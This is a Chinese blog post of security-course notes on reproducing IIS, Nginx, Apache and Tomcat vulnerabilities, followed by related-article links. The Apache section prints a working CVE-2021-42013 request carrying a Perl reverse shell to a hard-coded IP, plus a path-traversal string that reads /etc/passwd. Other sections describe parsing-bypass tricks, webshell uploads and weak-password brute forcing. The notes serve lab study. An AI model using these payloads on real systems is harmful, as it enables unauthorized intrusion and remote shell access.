小迪安全 第59天 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

最新推荐文章于 2024-10-06 00:00:00 发布
最新推荐文章于 2024-10-06 00:00:00 发布
阅读量701 收藏 14
点赞数 19
文章标签: 安全 中间件 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44005305/article/details/137742482
版权

一.中间件-IIS-短文件&解析&蓝屏

IIS现在用的也少了,漏洞也基本没啥用

1、短文件:信息收集

2、文件解析:还有点用

3、HTTP.SYS:蓝屏崩溃

没有和权限挂钩

4、CVE-2017-7269 条件过老

windows 2003上面的漏洞

二.中间件-Nginx-文件解析&命令执行等

1. 后缀解析 文件名解析

配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。

这个跟文件上传类似,找到文件上传点,上传png图片

找到上传路径和nginx版本号

查看路径

添加后缀可以用php执行png

在图片里添加phpinfo执行

2. CVE-2013-4547

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

填入phpinfo

在1.jpg后加一个空格

获得路径地址

在jpg后加入两个空格.php

然后切换到Hex页面

将20 20 中后面的20替换为00

成功

3. cve_2021_23017 无 EXP

CVE-2021-23017:nginx DNS解析漏洞PoC公开-腾讯云开发者社区-腾讯云
(tencent.com)

4. cve_2017_7529 敏感信息泄露,意义不大

三. 中间件-Apache-RCE&目录遍历&文件解析等

Apache HTTP Server 是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服 务器具有快速、可靠且可通过简单的 API
进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍
历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文
件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别 名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响
Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

1.cve_2021_42013 RCE

监听端口

修改抓包内容,用POST提交,下面的是使用棱角社区生成的perl的反弹shell命令

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use 
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'

成功

2.cve_2021_41773 目录穿越

Apache HTTP Server 2.4.49、2.4.50 版本对路径规范化所做的更改中存在一个路 径穿越漏洞,攻击者可利用该漏洞读取到 Web
目录外的其他文件,如系统配置文件、网 站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

在Burp中修改:例如获取/etc/passwd下的目录信息
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/ passwd

3、cve-2017-15715

必须是黑名单

修改样式![](https://img-
blog.csdnimg.cn/direct/283d3f5c432b4fc89d504387ac71ddda.png)

在下面的1.php后加一个空格,在Hex对应位置改为0a

5、cve-2017-9798

信息泄露 价值不高。

6、cve-2018-11759

价值不高。

7、cve-2021-37580

shenyu 插件问题。

四.中间件-Tomcat-弱口令&文件上传&文件包含等

1.弱口令

进入页面,点击manager或直接url输入进去登录页面

可以爆破

找到文件上传点,上传jsp的后门代码,压缩为zip后改名后缀war再上传![](https://img-
blog.csdnimg.cn/direct/5d7a55d11d72483f8b35f7d131f229e7.png)

![](https://img-
blog.csdnimg.cn/direct/55541f651b8b453d8dc21d811926cc95.png)![](https://img-
blog.csdnimg.cn/direct/d0047501e75c4c828518bdd3e97a8ead.png)

访问该页面触发后门代码

链接

2.cve-2017-12615

put一个1.jsp

访问地址,再用哥斯拉链接就ok,这个后门代码是刚刚哥斯拉生成的

3.cve-2020-1938

就是一个文件包含漏洞

这里用了一个python3的

dacade/CVE-2020-1938
(github.com)

4.cve-2020-11996

拒绝服务,危害过大

5.cve-2020-9484

反序列化

这啥条件啊,太苛刻了= =

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

教IT的无语强
关注
服务攻防-中间件安全&CVE 复现&Apache&Tomcat&Nginx
m0_61506558的博客
12-16 661
IIS逐渐被淘汰,本篇文章主要介绍Apache&Tomcat&Nginx中间件出现的漏洞,如图 0-1所示为中间件解析报出的漏洞。(一)Nginx-文件解析&命令执行。
59-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 1003
本文章涉及ApacheTomcatNginx中间件重要的CVE漏洞复现
59服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx
weixin_71529930的博客
04-13 1150
war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径。利用icon目录必须是一个真实存在的目录,%2e为 "."如果cgi和cgid模块被设置了,那么可以进行命令执行。访问大马 根目录/jshell/jshell.jsp。找一个jsp编写的大马,把他压缩为war后缀的。搭建起来以后,抓包,put方式上传。上传php文件,会显示不能上传。
小迪安全笔记
kk369789的博客
09-28 1306
小迪安全笔记
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 6481
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exe、iiswrite等工具。
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2803
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
第61-服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
2401_84301352的博客
04-29 533
相关工具链接链接:https://pan.baidu.com/s/1a6Zt4e96rk87Kz0Gpzepig提取码:ospa。
CVE-2021-23017:nginx DNS解析漏洞PoC公开
weixin_43977912的博客
07-04 9926
漏洞评级 高危漏洞 确认受影响版本 0.6.18 - 1.20.0 确认修复版本 1.21.0、1.20.1 厂商 F5, Inc 厂商官网 https://nginx.org/ 厂商参考资料 https://mailman.nginx.org/pipermail/nginx-announce/2021/000300.html 漏洞CVE CVE-2021-23017 CWE 193 CVSS评分 8.1 漏洞概述及影响 在处理DNS响应时,ngx_resolver_copy()中的一个off-by-on.
CVE-2021-23017:nginx DNS解析漏洞PoC公开,数据结构与算法面试题
2301_76379269的博客
04-17 1176
在处理DNS响应时,ngx_resolver_copy()中的一个off-by-one错误将允许网络攻击者在堆分配的缓冲区中写入超出边界的点字符(‘.’, 0x2E)。配置解析程序原语时,响应nginx服务器DNS请求的DNS响应可能会触发该漏洞。精心构造的数据包可以通过使用0x2E覆盖下一个堆块元数据的最低有效字节,此时,能够向nginx服务器提供DNS响应的网络攻击者可以实现拒绝服务攻击或远程代码执行攻击。
CVE-2020-1938/CNVD-2020-10487:Apache Tomcat 远程执行代码漏洞
anlalu233的博客
04-10 1006
背景 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件...
fastdfs--nginx安全漏洞(CVE-2021-23017)修复
李振伟的博客
08-01 4590
fastdfs--nginx安全漏洞 CVE-2021-23017
12-4 Nginx漏洞复现与分析
weixin_43263566的博客
11-29 1584
CGl: CGl是一种协议,用于定义Nginx或其他Web Server传递的数据格式。CGl是一个独立的程序,与Web Server无关,可以用任何语言编写CGl程序,比如C、Perl、Python等。Fastcgi: Fastcgi:是一种协议,前身是CGI,可以简单理解为是优化版的CGI,具有更高的稳定性和性能。PHP-CGI: 只是一个PHP的解释器,本身只能解析请求并返回结果,不会做进程管理。
小迪安全2023】第59:服务攻防-中间件安全&CVE复现&lS&Apache&Tomcat&Nginx
人若无名,便可专心练剑
04-27 1650
攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。4、中间件-Tomcat-弱口令&文件上传&文件包含等。
2020全年小迪网络安全笔记(目录)
u013630181的博客
06-09 1万+
2020小迪网络安全 课程体系/目录: 2020上半年70 基础入门…第1 信息收集…第2-3 漏洞分类…第4 漏洞发现…第5 漏洞利用…第6-28 安全开发…第29-38 代码审计…第39-43 权限提升…第44-50 内网安全…第51-56和第59 大赛特训…第67-70 实例任务…第57-58和第63-66 应急响应…第60-62 其他补充… 2020下半年86 基础入门…第1-6 信息收集…第7-10 WEB漏洞…第11-39 JAVA安全…第40-41 漏洞
服务安全-中间件-Apache&Tomcat&Nginx
m0_65336233的博客
11-09 1326
简单讲解中间价-Apache&Tomcat&Nginx漏洞
NGINX DNS解析漏洞(CVE-2021-23017)
热门推荐
淡定波的博客
07-02 1万+
一、漏洞情况说明: Nginx DNS解析漏洞(CVE-2021-23017): 在处理DNS响应时,ngx_resolver_copy()中的一个off-by-one错误将允许网络攻击者在堆分配的缓冲区中写入超出 边界的点字符(‘.’, 0x2E)。配置解析程序原语时,响应nginx服务器DNS请求的DNS响应可能会触发该漏洞。精心构造的数据包可以通过使用0x2E覆盖下一个堆块元数据的最低有效字节,此时,能够向nginx服务器提供DNS响应的网络攻击者可以实现拒绝服务攻击或远程代码执行攻击。 由于ngin
网络安全概述:从认知到实践
l1x1n0的博客
10-04 627
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 475
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
前置机、跳板机、堡垒机:安全运维领域的“黄金三角”
拉格朗日的学习笔记
09-28 950
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值